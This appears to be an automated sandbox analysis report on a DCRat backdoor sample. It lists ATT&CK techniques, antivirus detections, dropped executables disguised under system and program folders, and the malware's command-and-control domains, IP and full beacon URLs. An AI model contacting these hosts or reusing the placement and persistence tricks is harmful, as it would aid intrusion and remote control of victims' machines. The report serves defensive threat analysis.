Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Scripting	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Software Packing	DCSync	37 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
CPYEzG7VGh.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.Uztuby
CPYEzG7VGh.exe	100%	Avira	VBS/Runner.VPG
CPYEzG7VGh.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\surrogateserverreviewsession\Agentserver.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	100%	Avira	HEUR/AGEN.1323984
C:\surrogateserverreviewsession\dasHost.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	100%	Avira	HEUR/AGEN.1323984
C:\surrogateserverreviewsession\pmMvwz3lY7qlA.vbe	100%	Avira	VBS/Runner.VPG
C:\Program Files\7-Zip\Lang\Memory Compression.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\cAOdivXVvC.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	100%	Avira	HEUR/AGEN.1323984
C:\surrogateserverreviewsession\Agentserver.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	100%	Joe Sandbox ML
C:\surrogateserverreviewsession\dasHost.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Lang\Memory Compression.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	83%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\7-Zip\Lang\Memory Compression.exe	83%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\Windows NT\uXGucUKOPdf.exe	83%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe	83%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\uXGucUKOPdf.exe	83%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Windows\Containers\serviced\uXGucUKOPdf.exe	83%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Windows\Offline Web Pages\uXGucUKOPdf.exe	83%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\surrogateserverreviewsession\Agentserver.exe	83%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\surrogateserverreviewsession\dasHost.exe	83%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
vh438.timeweb.ru	185.114.245.123	true	true	unknown
cy08450.tw1.ru	185.114.245.123	true	true	unknown
53.210.109.20.in-addr.arpa	unknown	unknown	false	unknown
241.42.69.40.in-addr.arpa	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Reputation
http://cy08450.tw1.ru/98c5dfaf.php?6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn&3e48e0b3851c0a441c70744047c3bbd6=2dfc2c4d65174f7765d320b12c48ed88&a552bb1baa0205e417bc3d750c585e5e=QZ3EzN1QWYlVDOzMTYxUTNkNzMjRzYxYjNzYTM5cTNiZWNxEWOmVmY&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn	true	unknown
https://vh438.timeweb.ru/parking/?ref=cy08450.tw1.ru&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn&3e48e0b3851c0a441c70744047c3bbd6=2dfc2c4d65174f7765d320b12c48ed88&a552bb1baa0205e417bc3d750c585e5e=QZ3EzN1QWYlVDOzMTYxUTNkNzMjRzYxYjNzYTM5cTNiZWNxEWOmVmY&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn	true	unknown
http://cy08450.tw1.ru/@=YWYmRWNjhTO	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://timeweb.com/ru/?admitad_uid=3w3tocvbxr6b5598f8a15fb557f5d8&ulp=ru.hostings.info/timeweb-	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/about/clients/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126A1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/services/dedicated-server/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://vk.com/timewebru	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chats.viber.com/timeweb	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://vds.timeweb.ru/login	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/about/news/3025/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126A1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/services/vds/	Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://dev.documents.timeweb.net/files/policy/personal_data.pdf	Memory Compression.exe, 00000024.00000002.2240602993.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126A1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002794000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/support/faq/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126A1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/services/domains/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/search/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/solutions/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/about/contacts/	Memory Compression.exe, 00000024.00000002.2240602993.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126A1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002794000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/services/bitrix/license/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/about/staff/	Memory Compression.exe, 00000024.00000002.2240602993.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126A1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002794000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://vh438.timeweb.ru	Memory Compression.exe, 00000024.00000002.2240602993.000000000275E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/	Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/services/dedicated-server/data-centers/	Memory Compression.exe, 00000024.00000002.2240602993.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126A1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002794000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://vh438.timeweb.ru	Memory Compression.exe, 00000024.00000002.2240602993.0000000002776000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/?admitad_uid=3w3tocvbxr6b5598f8a15fb557f5d8&ulp=hosters.ru/timeweb/otzyvi	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/partners/integrator/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://craftum.com/?utm_source=banner&utm_medium=parking&utm_campaign=3_gates	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://craftum.com/?utm_source=timeweb&utm_medium=banner&utm_campaign=parking-page	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://vh438.timeweb.ru(	Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Agentserver.exe, 00000005.00000002.2122617723.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002731000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://timeweb.com/ru/templateshop/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/partners/webmasters/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/partners/logo/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/about/why-choose-us/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.instagram.com/accounts/login/?next=/timeweb.ru/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://vh438.timeweb.ru/parking/?ref=cy08450.tw1.ru&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKN	Memory Compression.exe, 00000024.00000002.2240602993.000000000275E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://wm.timeweb.ru/login	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/services/cms/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://cy08450.tw1.ru/98c5dfaf.php?6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWx	Memory Compression.exe, 00000024.00000002.2240602993.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
